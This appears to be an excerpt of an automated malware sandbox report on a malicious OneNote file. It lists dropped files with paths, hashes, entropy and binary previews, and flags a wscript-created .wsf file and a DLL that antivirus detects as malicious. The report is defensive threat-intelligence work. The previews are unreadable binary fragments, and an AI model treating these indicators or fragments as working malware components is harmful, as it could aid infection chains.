Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	362512
Entropy (8bit):	7.486488481684869
Encrypted:	false
SSDEEP:	6144:4yHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:sWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
MD5:	068917159F7B3A87B745C76306DE1A09
SHA1:	A8700D2CB6D7DCFD9EDB808FB20D159FA3AAC901
SHA-256:	0DFE0804E3C3EE995CBEEF2B4A5258E60130A7DCFA4C9FD25349575048355772
SHA-512:	431F332AE086AEDE4820301F44CDD8F1258E790186DAD6C03FA1BF0BC76D9B24FC985567F09CEE5BE25EC2CBB71A09AECE5D67E666DBBF2D3C98C7CCD23D4AB8
Malicious:	false
Preview:	.R\{..M..Sx.)..8...%8.H.vu..J.l................?.....I...................................................................(....0.F..zk4..y.d(.x...........(~......................8.......0.....................U.r..H..\|.4.Aw........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	2.772717925458309
Encrypted:	false
SSDEEP:	48:mnOV/uIPv4om1mAlthbXV4AbFSac0/ac3:anrDRZsa9/aq
MD5:	28259565BD67DF1A8F899327FA76F23E
SHA1:	58A94AAC17F71F13BC5D4BC779885E85BFF040FE
SHA-256:	193D3D93633FD11D5C2D1E356063FB1367C3316627134F86DD6C2274E10B72A4
SHA-512:	950D11D42FC3AF97849A002819DFB9C0E95DA1A70D5B878957F5BA17C6C47FD6FD2682798635ABEA33A644A125CE3971D404D3972B20731B532807C30BFCDA5E
Malicious:	false
Preview:	./.C..vL....W"v_(....0.F..zk4..y................?.....I.................................................................................................................................................................D..C.. ..........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.3315379418402035
Encrypted:	false
SSDEEP:	6:szOus/2T+t+Wpya/uMcl0qvMcl951QOgXb+lhqMlW8g1UEZ+lX1MAx7vKlCXlvk4:szO1Lyaq99951Qvb+2kXg1Q137v+uk4
MD5:	54B8ECE57C4CE00752B488BD3A6FA687
SHA1:	E20C2B289AA26DA9518594AA6769F431151A965B
SHA-256:	26D480B247D1EE7D836387ED405E75518CA0392BFC978F803B038EE806C93EF6
SHA-512:	48F930F1FE5B638F35362390F606A425030B818BB0BE8477ACE153624D8610309EBCE335428F13D34B32822F2DC7C5C448B8CB46B08694B1B2CC981F833511C9
Malicious:	false
Preview:	.@..h...........................................h........................................................@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................%...... ......]D..X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.........Dd..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\click.wsf

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:	3:tWn:tWn
MD5:	07F5A0CFFD9B2616EA44FB90CCC04480
SHA1:	641B12C5FFA1A31BC367390E34D441A9CE1958EE
SHA-256:	A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
SHA-512:	09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
Malicious:	true
Preview:	badum tss

C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	7.337848702590508
Encrypted:	false
SSDEEP:	6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5:	BFC060937DC90B273ECCB6825145F298
SHA1:	C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256:	2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512:	CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: INNOVINC.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing_1.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse Filename: OMICS_Online_1.one, Detection: malicious, Browse Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse Filename: Omics_Journal.one, Detection: malicious, Browse Filename: OMICS.one, Detection: malicious, Browse Filename: OPAST_GROUP_1.one, Detection: malicious, Browse Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse Filename: OPAST_GROUP.one, Detection: malicious, Browse Filename: Opast_International.one, Detection: malicious, Browse Filename: opastonline.com.one, Detection: malicious, Browse Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse Filename: Opast_Publishing_Group.one, Detection: malicious, Browse Filename: omicsonline.net.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse Filename: 2023-03-16_0923.one, Detection: malicious, Browse Filename: report_03_16_2023.one, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{002E70FD-1235-4A9E-B8A8-C6BF01538544}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{0229BB90-BB48-44A9-B16E-296D0771A7F6}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{02A775DA-AB80-4F59-A2CC-90196342D726}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{0391BA2D-AA21-4374-82F1-263FB294F358}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{050465E2-71AF-499C-AFE4-E01600EEE0A9}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{051460EC-7619-474D-AFC4-D8775D9393F0}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{05C95929-2E26-43C1-AE7E-E5ABF4F4B376}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{060F3829-7211-4B9C-8364-164C7EF99AB6}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{0A5ADFFE-3EFF-4C23-B9C4-739F4D3A9682}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{0EA89F43-FA8C-4B0E-9E7B-C4613C34F209}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
